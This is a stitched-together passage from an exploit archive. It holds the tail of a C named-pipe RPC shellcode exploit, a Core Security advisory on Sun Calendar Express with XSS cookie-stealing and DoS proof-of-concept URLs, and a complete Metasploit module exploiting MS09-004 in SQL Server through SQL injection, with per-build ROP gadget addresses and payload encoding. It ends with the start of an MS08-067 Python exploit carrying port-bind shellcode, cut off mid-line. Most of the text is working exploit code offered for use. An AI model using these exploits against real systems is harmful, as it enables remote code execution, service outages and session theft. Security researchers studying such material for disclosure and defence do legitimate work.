    printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" );
    BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");
    printf( "Send shellcode ....\n" );
    TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);
    printf( "Send Exploit ...... \n" );
    TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);
    CloseHandle( hFile );
    return 0;
}
// milw0rm.com [2008-11-12]
Core Security/Sun Calendar Express Web Server (DoS/XSS) Multiple Remote Vulns ( multiple)
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Multiple vulnerabilities in Sun Calendar Express Web Server
1. *Advisory Information*
Title: Multiple vulnerabilities in Sun Calendar Express Web Server
Advisory ID: CORE-2009-0108
Advisory URL: http://www.coresecurity.com/content/sun-calendar-express
Date published: 2009-03-31
Date of last update: 2009-03-31
Vendors contacted: Sun Microsystems
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Denial of service (DoS), Cross site scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 34150, 34152, 34153
CVE Name: N/A
3. *Vulnerability Description*
Several vulnerabilities have been discovered in Sun Java System Calendar
Express web server [1]. First, an attacker can crash the web server,
creating a Denial of Service condition, simply by requesting a certain URL
twice. Second, several Cross-site scripting vulnerabilities [2], [3]
were found in the following files/urls:
1. 'https://<server>:3443/login.wcap'
2. 'https://<server>:3443/command.shtml'
Cross-site scripting (XSS) vulnerabilities allow an attacker to execute
arbitrary scripting code in the context of the user's browser (in the
vulnerable application's domain). For example, an attacker could exploit
an XSS vulnerability to steal user cookies (and then impersonate the
legitimate user) or fake a page requesting information from the user (e.g.
credentials). This vulnerability occurs when user-supplied data is
displayed without encoding.
4. *Vulnerable packages*
. Sun ONE Calendar Server 6.0
. Sun Java System Calendar Server 6 2004Q2
. Sun Java System Calendar Server 6 2005Q1
. Sun Java System Calendar Server 6 2005Q4
. Sun Java System Calendar Server 6.3
. Sun Java System Calendar Server 6.3-7.01 (built Feb 20 2008)
5. *Vendor Information, Solutions and Workarounds*
Sun has published patches and a Sun alert for these vulnerabilities. The
Sun alert will be available at:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-256228-1
6. *Credits*
These vulnerabilities were discovered by the SCS team from Core Security
Technologies.
7. *Technical Description / Proof of Concept Code*
Cross-Site Scripting (commonly referred to as XSS) bugs arise from a web
application's improper encoding or filtering of input obtained from
untrusted sources. These bugs allow an attacker to inject malicious tags
and/or script code that is later executed in the context of a web
browser when the user accesses the vulnerable web site. The injected
code then takes advantage of the trust relationship between the web
browser and the vulnerable web application. Attacks that exploit XSS
bugs are targeted at users of a vulnerable web application rather than
at the application itself, although one could say that since the XSS
vulnerability in the web application created the vector that allows the
compromise of several of its users' web browsers, the web application
itself originated the problem. The term 'cross-site scripting' is also
sometimes used in a broader-sense referring to different types of
vulnerabilities that lead to attacks that inject scripting code into
client applications from sources that would not be trusted during script
execution runtime if the corresponding bug did not exist. For additional
information, please look at the references [2], [3], [4], [5] and [6].
7.1. *Vulnerability #1 - XSS (BID 34152)*
Cross-site scripting vulnerabilities were found in the following file/url:
/-----------
https://<server>:3443/login.wcap
- -----------/
This is the login page of the Sun Java System Calendar Express Web
application; although the affected URL is originally accessed through a
POST request, this vulnerability can be exploited both with a GET and
with a POST request.
Using the following variables:
/-----------
Fmt-out
- -----------/
the contents of the variables listed above are not encoded when they are
used in HTML output, which allows an attacker who controls their content
to insert JavaScript code.
The following code is a proof of concept of this flaw:
/-----------
https://<server>:3443/login.wcap?calid=&calname=&date=&fmt-out=<script>alert(document.cookie)</script>&view=&locale=&tzid=&test=1229606492214&user=test&password=test
- -----------/
*Note:* Fields previously listed were verified for this type of issue.
Other fields on this or other pages for this application could be also
vulnerable to the same type of issue.
7.2. *Vulnerability #2 - XSS (BID 34153)*
Cross-site scripting vulnerabilities were found in the following file/url:
/-----------
https://<server>:3443/command.shtml
- -----------/
Using the following variables:
/-----------
date
- -----------/
the contents of the 'date' variable are not encoded when they are used in
HTML output, which allows an attacker who controls their content to insert
JavaScript code.
The following code is a proof of concept of this flaw:
/-----------
https://<server>:3443//command.shtml?view=overview&id=HK8CjQOkmbY&date=20081217T200734%27;alert('xss');//Z&caliad=someid@test.com&security=1
- -----------/
*Note:* Fields previously listed were verified for this type of issue.
Other fields on this or other pages for this application could be also
vulnerable to the same type of issue.
7.3. *Vulnerability #3 - DoS (BID 34150)*
An attacker can crash the Sun Java System Calendar Express web server,
creating a Denial of Service condition, simply by requesting a certain URL
twice. Go to a browser and enter the following URL:
/-----------
https://<server>:3443/?tzid=crash
- -----------/
where 'crash' can in fact be any string of alphabetic characters. The
first time you will receive an error. If at this point you access
'https://<server>:3443/' again, the web server will still be operational.
Then access the URL 'https://<server>:3443/?tzid=crash' again: this will
crash the server a second time, and now the web server stops responding
until the administrator restarts the process.
8. *Report Timeline*
. 2009-01-09: Core Security Technologies notifies Sun Security
Coordination Team of the vulnerability, setting the estimated
publication date of the advisory to Feb 2nd. Technical details provided
in an encrypted document.
. 2009-01-09: The vendor acknowledges reception of the report and asks
Core to postpone publication of the security advisory in order to have
enough time to investigate and fix the bugs. Vendor requests GPG key of
Core's security Advisories team.
. 2009-01-12: Core agrees to postpone publication of the security
advisory but asks the vendor for feedback from its engineering team as
soon as possible in order to coordinate the release date of fixes and
security advisories.
. 2009-01-21: Core asks Sun for an estimated date for the release of
patches and fixes.
. 2009-01-21: Sun Security Coordination Team notifies Core that the
vendor's engineering team is hoping to have patches released sometime
near the end of February or the beginning of March. The time-frame is
tentative due to the vendor's QA testing process that includes testing
of all patches which may include fixes to bugs unrelated to those
reported by Core. Sun will issue a Sun Alert associated to these bugs
and would like to coordinate its publication date with that of Core's
security advisory.
. 2009-02-06: Core re-schedules the advisory publication date to Feb
25th. Updated timeline sent to the vendor requesting confirmation that
patches will be released by then.
. 2009-02-09: Sun Security Coordination team acknowledges previous email
from Core and indicates it has requested confirmation from the
engineering team that they are on track for release by the end of February.
. 2009-02-10: Vendor asks Core for the exact version and patch level of
the tested Calendar Express Web server package and provides the URL to
the latest released patch
(http://sunsolve.sun.com/search/document.do?assetkey=1-21-121657-32-1)
. 2009-02-10: Core sends requested information (output of csversion
command) and indicates that the bugs were found on release packages with
no additional patches installed.
. 2009-02-11: Sun security coordination team acknowledges email from
Core and indicates that it will pass the information to the engineering
team.
. 2009-02-16: The vendor asks Core to delay the advisory publication
until the end of March, in order to finish a rigorous process of
internal testing. Sun also indicates that the DoS vulnerability had been
identified previously as Sun bug 6728790 and fixed in patches already
released: Patches 121657-30 (Solaris SPARC), 121658-30 (Solaris x86) and
121659-30 (Linux) and also in the later revisions of these patches.
. 2009-02-16: Core re-schedules the advisory publication date to March
30th. Core indicates that it would appreciate further technical details
about the flaws from the vendor's engineering team.
. 2009-02-17: Vendor acknowledges previous email.
. 2009-03-17: Core reminds the vendor that publication of the advisory
is scheduled for March 30th. Core also requests updated information
about the development and release of fixed versions.
. 2009-03-23: Vendor estimates that it is on track to have the fix ready
for publication at the end of the month, March 30th.
. 2009-03-23: Core acknowledges reception and requests a list of
affected versions and a link to fixed versions and any additional
information for Sun customers.
. 2009-03-25: Vendor informs that fixes will probably be released on
March 30th, and provides a list of affected products and versions.
. 2009-03-30: Core requests confirmation that patches will be released.
. 2009-03-31: Vendor confirms the release of patches and provides a link
to the Sun alert.
. 2009-03-31: The advisory CORE-2009-0108 is published.
9. *References*
[1] http://www.sun.com/software/products/calendar_srvr/
[2] HTML Code Injection and Cross-Site Scripting
http://www.technicalinfo.net/papers/CSS.html.
[3] The Cross-Site Scripting FAQ (XSS)
http://www.cgisecurity.com/articles/xss-faq.shtml
[4] How to prevent Cross-Site Scripting Security Issues
http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985
[5] How to review ASP Code for CSSI Vulnerability
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253119
[6] How to review Visual InterDev Generated Code for CSSI Vulnerability
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253120
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
11. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
# milw0rm.com [2009-03-31]
metasploit/Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection ( windows)
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::MSSQL_SQLI
# Declares the module: metadata and references, payload constraints, the
# per-build target table and the VERBOSE option.
#
# Each concrete target hash carries the offsets and addresses that `exploit`
# reads ('Num', 'VtOff', 'VtDisp', 'Writable', 'Vtable', 'Disp', 'ecx2esp',
# 'Popped', 'Offset', 'FixESP', 'Ret'); 'FixDisp' is only printed there.
# 'Automatic' (index 0, the default) is resolved in `exploit` from the build
# string reported by @@version, and 'CRASHER' sends a pattern buffer with no
# payload.  The description's ordering of the 'Targets' array matters: the
# indexes 1..8 are hard-coded in `exploit`.
def initialize(info = {})
  super(update_info(info,
    'Name' => 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
    'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.
Microsoft patched this vulnerability in SP3 for 2005 without any public
mention.
This exploit smashes several pointers, as shown below.
1. pointer to a 32-bit value that is set to 0
2. pointer to a 32-bit value that is set to a length influcenced by the buffer
length.
3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,
this value is referenced with a displacement of 0x38. For MSSQL 2005, the
displacement is 0x10. The address of our buffer is conveniently stored in
ecx when this instruction is executed.
4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with
a displacement of 4. This pointer is not used by this exploit.
This particular exploit replaces the previous dual-method exploit. It uses
a technique where the value contained in ecx becomes the stack. From there,
return oriented programming is used to normalize the execution state and
finally execute the payload via a "jmp esp". All addresses used were found
within the sqlservr.exe memory space, yielding very reliable code execution
using only a single query.
NOTE: The MSSQL server service does not automatically restart by default. That
said, some exceptions are caught and will not result in terminating the process.
If the exploit crashes the service prior to hijacking the stack, it won't die.
Otherwise, it's a goner.
},
    'Author' =>
    [
      'jduck', # MS09-004 base exploit
      'Rodrigo Marcos' # SQL Injection mods
    ],
    'License' => MSF_LICENSE,
    'Version' => '$Revision: 11730 $',
    'References' =>
    [
      [ 'OSVDB', '50589' ],
      [ 'CVE', '2008-5416' ],
      [ 'BID', '32710' ],
      [ 'MSB', 'MS09-004' ],
      [ 'URL', 'http://www.milw0rm.com/exploits/7501' ],
      [ 'URL', 'http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/' ]
    ],
    'DefaultOptions' =>
    {
      'EXITFUNC' => 'seh',
      'InitialAutoRunScript' => 'migrate -f'
    },
    # No BadChars: mssql_encode_string rewrites every byte the query text
    # cannot carry, so the encoder is left unconstrained.
    'Payload' =>
    {
      'Space' => 512,
      'BadChars' => "", # bad bytes get encoded!
      'PrependEncoder' => "\x81\xc4\xf0\xef\xff\xff",
      'DisableNops' => true
    },
    'Platform' => 'win',
    'Privileged' => true,
    'Targets' =>
    [
      # auto targeting!
      [ 'Automatic', { } ],
      #
      # Individual targets
      #
      [
        # Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
        # Aug 6 2000 00:57:48
        'MSSQL 2000 / MSDE SP0 (8.00.194)',
        {
          'Num' => 32, # value for "start_offset"
          'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
          'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
          'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
          'Vtable' => 0x00a87f26, # becomes eax for [eax+0x38] (must be valid to exec)
          'FixDisp' => 0x6900a7, # not directly used - call [ecx+0x08]
          'Disp' => 0x08, # displacement on call [ecx+disp] used
          'ecx2esp' => 0x0041b78f, # xchg ecx,esp / sbb [eax],al / pop esi / ret
          'Popped' => 0x4, # byte count popped in above (before ret)
          'Offset' => 0x28, # offset to the new stack!
          'FixESP' => 0x0071f5fb, # advance esp to next ret (add esp,0x20 / ret)
          'Ret' => 0x0041c9a2 # jmp esp
        },
      ],
      [
        # Microsoft SQL Server 2000 - 8.00.384 (Intel X86)
        # May 23 2001 00:02:52
        'MSSQL 2000 / MSDE SP1 (8.00.384)',
        {
          'Num' => 32, # value for "start_offset"
          'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
          'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
          'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
          'Vtable' => 0x00a95b2f, # becomes eax for [eax+0x38] (must be valid to exec)
          'FixDisp' => 0x4b4f00, # not directly used - call [ecx-0x18]
          'Disp' => 0x34, # displacement on call [ecx+disp] used
          'ecx2esp' => 0x0044d300, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret
          'Popped' => 0x8, # byte count popped in above (before ret)
          'Offset' => 0x28, # offset to the new stack!
          'FixESP' => 0x004a2ce9, # advance esp to next ret (add esp,0x1c / ret)
          'Ret' => 0x004caa15 # jmp esp
        },
      ],
      [
        # Microsoft SQL Server 2000 - 8.00.534 (Intel X86)
        # Nov 19 2001 13:23:50
        'MSSQL 2000 / MSDE SP2 (8.00.534)',
        {
          'Num' => 32, # value for "start_offset"
          'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
          'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
          'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
          'Vtable' => 0x00a64f7e, # becomes eax for [eax+0x38] (must be valid to exec)
          'FixDisp' => 0x660077, # not directly used - call [ecx-0x18]
          'Disp' => 0x34, # displacement on call [ecx+disp] used
          'ecx2esp' => 0x0054131c, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret
          'Popped' => 0x8, # byte count popped in above (before ret)
          'Offset' => 0x28, # offset to the new stack!
          'FixESP' => 0x005306a0, # advance esp to next ret (add esp,0x1c / ret)
          'Ret' => 0x004ca984 # jmp esp
        },
      ],
      [
        # Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
        # Dec 17 2002 14:22:05
        'MSSQL 2000 / MSDE SP3 (8.00.760)',
        {
          'Num' => 32, # value for "start_offset"
          'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
          'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
          'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
          'Vtable' => 0x00ac344e, # becomes eax for [eax+0x38] (must be valid to exec)
          'FixDisp' => 0x490074, # not directly used - call [ecx+0x14]
          'Disp' => 0x34, # displacement on call [ecx+disp] used
          'ecx2esp' => 0x00454303, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret
          'Popped' => 0x8, # byte count popped in above (before ret)
          'Offset' => 0x28, # offset to the new stack!
          'FixESP' => 0x00503413, # advance esp to next ret (add esp,0x20 / ret)
          'Ret' => 0x0043fa97 # jmp esp
        },
      ],
      [
        # Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
        # May 3 2005 23:18:38
        'MSSQL 2000 / MSDE SP4 (8.00.2039)',
        {
          'Num' => 32, # value for "start_offset"
          'VtOff' => -13, # offset from 'Num' to smashed vtable ptr
          'VtDisp' => 0x38, # displacement from call [eax+0x38] crash
          'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)
          'Vtable' => 0x0046592e, # becomes eax for [eax+0x38] (must be valid to exec)
          'FixDisp' => 0x69f5e8, # not directly used - call [ecx+0x14]
          'Disp' => 0x14, # displacement on call [ecx+disp] used
          'ecx2esp' => 0x007b39a8, # push ecx / pop esp / mov ax,[eax+0x18] / mov [ecx+0x62],ax / pop ebp / ret 0x4
          'Popped' => 0x4, # byte count popped in above (before ret)
          'Offset' => 0x20, # offset to the new stack!
          'FixESP' => 0x00b3694d, # advance esp to next ret (add esp,0x20 / ret)
          'Ret' => 0x0047c89d # jmp esp
        },
      ],
      [
        # Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
        # Oct 14 2005 00:33:37
        'MSSQL 2005 SP0 (9.00.1399.06)',
        {
          'Num' => 32, # value for "start_offset"
          'VtOff' => 63, # offset from 'Num' to smashed vtable ptr
          'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash
          'Writable' => 0x53ad5330, # any writable addr (not even necessary really)
          'Vtable' => 0x02201ca8, # becomes eax for [eax+0x38] (must be valid to exec)
          'FixDisp' => 0x10e860f, # not directly used - call [ecx+0x14]
          'Disp' => 0x50, # displacement on call [ecx+disp] used
          'ecx2esp' => 0x0181c0d4, # push ecx / pop esp / pop ebp / ret
          'Popped' => 0x4, # byte count popped in above (before ret)
          'Offset' => 0x20, # offset to the new stack!
          'FixESP' => 0x0147deb7, # advance esp to next ret (add esp,0x10 / ret)
          'Ret' => 0x0112c2c7 # jmp esp
        },
      ],
      [
        # Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86)
        # Apr 14 2006 01:12:25
        'MSSQL 2005 SP1 (9.00.2047.00)',
        {
          'Num' => 32, # value for "start_offset"
          'VtOff' => 63, # offset from 'Num' to smashed vtable ptr
          'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash
          'Writable' => 0x53ad5330, # any writable addr (not even necessary really)
          'Vtable' => 0x0244c803, # becomes eax for [eax+0x38] (must be valid to exec)
          'FixDisp' => 0x17139e9, # not directly used - call [ecx+0x14]
          'Disp' => 0x52, # displacement on call [ecx+disp] used
          'ecx2esp' => 0x0183bf9c, # push ecx / pop esp / pop ebp / ret
          'Popped' => 0x4, # byte count popped in above (before ret)
          'Offset' => 0x20, # offset to the new stack!
          'FixESP' => 0x014923c1, # advance esp to next ret (add esp,0x10 / ret)
          'Ret' => 0x011b204c # jmp esp
        },
      ],
      [
        # Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
        # Feb 9 2007 22:47:07
        'MSSQL 2005 SP2 (9.00.3042.00)',
        {
          'Num' => 32, # value for "start_offset"
          'VtOff' => 63, # offset from 'Num' to smashed vtable ptr
          'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash
          'Writable' => 0x53ad5330, # any writable addr (not even necessary really)
          'Vtable' => 0x027fca52, # becomes eax for [eax+0x38] (must be valid to exec)
          'FixDisp' => 0x1106d6b, # not directly used - call [ecx+0x14]
          'Disp' => 0x52, # displacement on call [ecx+disp] used
          'ecx2esp' => 0x01849641, # push ecx / pop esp / pop ebp / ret
          'Popped' => 0x4, # byte count popped in above (before ret)
          'Offset' => 0x20, # offset to the new stack!
          'FixESP' => 0x01498b22, # advance esp to next ret (add esp,0x10 / ret)
          'Ret' => 0x010a5379 # jmp esp
        },
      ],
      [ 'CRASHER', { } ]
    ],
    'DefaultTarget' => 0,
    'DisclosureDate' => 'Dec 09 2008'
  ))
  # VERBOSE is passed through to every mssql_query call made by this module.
  register_options(
    [
      OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ])
    ])
end
# Classifies the host by the build string that @@version reports.
#
# Port-1434 (SSRP) pings are deliberately not used: they are localhost-only
# on MSSQL 2005 and newer and do not carry an exact build/SP number, so the
# supplied credentials are used to log in and query the version instead
# (see mssql_query_version).
#
# @return [Exploit::CheckCode] Vulnerable when the reported build is one of
#   the eight builds in the target table, Safe otherwise (including when no
#   version string could be obtained)
def check
  version = mssql_query_version
  return Exploit::CheckCode::Safe unless version

  print_status("@@version returned:\n\t" + version)

  # Builds that have a matching entry in 'Targets'.  Any others?
  known_builds = [
    /8\.00\.194/, /8\.00\.384/, /8\.00\.534/, /8\.00\.760/, /8\.00\.2039/,
    /9\.00\.1399\.06/, /9\.00\.2047\.00/, /9\.00\.3042\.00/
  ]
  if known_builds.any? { |build| version =~ build }
    Exploit::CheckCode::Vulnerable
  else
    Exploit::CheckCode::Safe
  end
end
# Builds and sends the single injected query.
#
# With the 'Automatic' target the build string from mssql_query_version is
# mapped onto `targets[1..8]` (the order of the 'Targets' array declared in
# `initialize`).  The CRASHER target sends a 2048-byte pattern buffer only;
# every other target lays the buffer out from its offset table and appends
# `payload.encoded`.  The buffer is passed through mssql_encode_string
# before it is spliced into the query template.
#
# @raise [RuntimeError] when the version cannot be read, or does not match
#   any table entry
def exploit
  mytarget = nil
  if target.name =~ /Automatic/
    print_status("Attempting automatic target detection...")
    version = mssql_query_version
    raise RuntimeError, "Unable to get version!" if not version
    # Indexes follow the 'Targets' array: 0 is Automatic, 1..8 the builds.
    if (version =~ /8\.00\.194/)
      mytarget = targets[1]
    elsif (version =~ /8\.00\.384/)
      mytarget = targets[2]
    elsif (version =~ /8\.00\.534/)
      mytarget = targets[3]
    elsif (version =~ /8\.00\.760/)
      mytarget = targets[4]
    elsif (version =~ /8\.00\.2039/)
      mytarget = targets[5]
    elsif (version =~ /9\.00\.1399\.06/)
      mytarget = targets[6]
    elsif (version =~ /9\.00\.2047\.00/)
      mytarget = targets[7]
    elsif (version =~ /9\.00\.3042\.00/)
      mytarget = targets[8]
    end
    if mytarget.nil?
      raise RuntimeError, "Unable to automatically detect the target"
    else
      print_status("Automatically detected target \"#{mytarget.name}\"")
    end
  else
    mytarget = target
  end
  # Query template; %NUM% and %STUFF% are substituted below.  The literal is
  # kept flush-left because its leading whitespace is part of the string.
  sqlquery = %Q|declare @i int,@z nvarchar(4000)
set @z='declare @e int,@b varbinary,@l int;'
set @z=@z+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'
exec sp_executesql @z|
  # just crash it with a pattern buffer if the CRASHER target is selected..
  if mytarget.name == 'CRASHER'
    sploit = Rex::Text.pattern_create(2048)
    print_status("Attempting to corrupt memory to cause an exception!")
    num = 32
  else
    # trigger the memory corruption
    num = mytarget['Num']
    vt_off = mytarget['VtOff']
    vt_disp = mytarget['VtDisp']
    vtable = mytarget['Vtable']
    ecx_disp = mytarget['Disp']
    esp_off = mytarget['Offset']
    hijack_esp = mytarget['ecx2esp']
    first_esp = mytarget['Popped']
    fix_esp = mytarget['FixESP']
    writable = mytarget['Writable']
    corruptable_bytes = 0x44
    # make sploit buff
    sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length
    #sploit = Rex::Text.pattern_create(sz)
    sploit = rand_text_alphanumeric(sz)
    # remove displacement! (using call [ecx+displacement])
    vtable_off = (num + vt_off)
    sploit[vtable_off,4] = [(vtable - vt_disp)].pack('V')
    # stack -> heap
    hijack_off = vtable_off + ecx_disp
    sploit[hijack_off,4] = [hijack_esp].pack('V')
    # becomes eax on mssql 2ksp4 (prevent crash)
    sploit[(vtable_off-4),4] = [writable].pack('V')
    # becomes eip after esp hijack
    fixesp_off = vtable_off + first_esp
    sploit[fixesp_off,4] = [fix_esp].pack('V')
    # rest of magic stack (disable DEP?)
    stack_off = vtable_off + esp_off
    stack = []
    stack << mytarget['Ret']
    stack = stack.pack('V*')
    # jump over the stuff that gets corrupted
    stack << "\xeb" + [corruptable_bytes].pack('C')
    stack << rand_text_alphanumeric(corruptable_bytes)
    stack << payload.encoded
    sploit[stack_off,stack.length] = stack
    # this has to be put in after the stack area since the ptr for sql2k sp1 is in the corrupted stuff
    # (it is the same value written at hijack_off above; the write here is intentional)
    sploit[hijack_off,4] = [hijack_esp].pack('V')
    print_status("Redirecting flow to %#x via call to our faked vtable ptr @ %#x" % [mytarget['FixDisp'], vtable])
  end
  # encode chars that get modified
  enc = mssql_encode_string(sploit)
  # put the number in (start offset)
  runme = sqlquery.gsub(/%NUM%/, num.to_s)
  runme.gsub!(/%STUFF%/, enc)
  # go!
  print_status('The SQL Server will probably die after exploitation. Follow the "POSTEXPLOITATION" instructions in the README file')
  begin
    mssql_query(runme, datastore['VERBOSE'])
  rescue ::Errno::ECONNRESET, EOFError
    # The service is expected to drop the connection; report it and still
    # fall through to the handler.
    print_error("Error: #{$!}")
  end
  handler
  disconnect
end
# Renders every byte of +str+ as a T-SQL `char(N)` call, joined with `+`.
#
# @param str [String] bytes to render (read with unpack('C*'), so any
#   encoding is treated as raw bytes)
# @return [String] e.g. "char(65)+char(66)" for "AB"; "" for an empty string
def mssql_str_to_chars(str)
  str.unpack('C*').map { |byte| "char(#{byte})" }.join('+')
end
# Turns +str+ into a T-SQL string expression that yields its bytes after the
# outer quoting used in `exploit` (the template wraps %STUFF% in doubled
# quotes, and the encoder starts with in_str = true, i.e. it assumes the
# caller has already opened the quote).  Single quotes are written four
# times, backslashes twice, and bytes listed in +badchars+ are emitted
# outside the quotes as `+char(0x..)`; the quote is re-opened with `+'` after
# such a fragment, including at the very end, so the result always leaves
# the caller's closing quote balanced.
#
# NOTE(review): `badchars.index(ch.chr)` compares a literal holding bytes
# >= 0x80 against a one-byte ASCII-8BIT string; on Ruby 1.9+ without a
# binary source encoding this may raise Encoding::CompatibilityError for
# input bytes >= 0x80 — confirm against the framework's Ruby version.
#
# @param str [String] raw bytes to encode
# @return [String] T-SQL fragment to splice between two single quotes
def mssql_encode_string(str)
  badchars = "\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f"
  enc = ""
  in_str = true # true while the output is inside an open quote
  str.unpack('C*').each do |ch|
    # double-double single quotes
    if ch == 0x27
      if not in_str
        enc << "+'"
        in_str = true
      end
      enc << ch.chr * 4
      next
    end
    # double backslashes
    if ch == 0x5c
      if not in_str
        enc << "+'"
        in_str = true
      end
      enc << ch.chr * 2
      next
    end
    # convert any bad stuff to char(0xXX)
    # (idx is only used for its truthiness; index 0 for "\x00" is still truthy)
    if ((idx = badchars.index(ch.chr)))
      enc << "'" if in_str
      enc << "+char(0x%x)" % ch
      in_str = false
    else
      enc << "+'" if not in_str
      enc << ch.chr
      in_str = true
    end
  end
  enc << "+'" if not in_str
  return enc
end
# Fingerprints the server build by response time rather than by parsing
# @@version: for each known build a query is sent that sleeps +delay+
# seconds only when PATINDEX finds that build in @@version, and the first
# query that takes longer than +delay+ names the build.
#
# @return [String, nil] the matching build string, or nil when the initial
#   reachability query itself exceeds +delay+ or no build matches
def mssql_query_version
  delay = 5
  # Let's first check that we can reach the host with no problems; a host
  # that is already this slow would make the timing test meaningless.
  started = Time.now
  mssql_query("select @@version", datastore['VERBOSE'])
  return nil if (Time.now - started) > delay

  # Now we test the SQL Server versions, in target-table order.
  versions = %w[8.00.194 8.00.384 8.00.534 8.00.760 8.00.2039 9.00.1399.06 9.00.2047.00 9.00.3042.00]
  versions.find do |version|
    started = Time.now
    mssql_query("if ((select PATINDEX('%#{version}%', @@version))>0)WAITFOR DELAY '00:00:#{delay.to_s}'", datastore['VERBOSE'])
    (Time.now - started) > delay
  end
end
end
Debasis Mohanty/MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3) ( windows)
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import struct
import sys
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
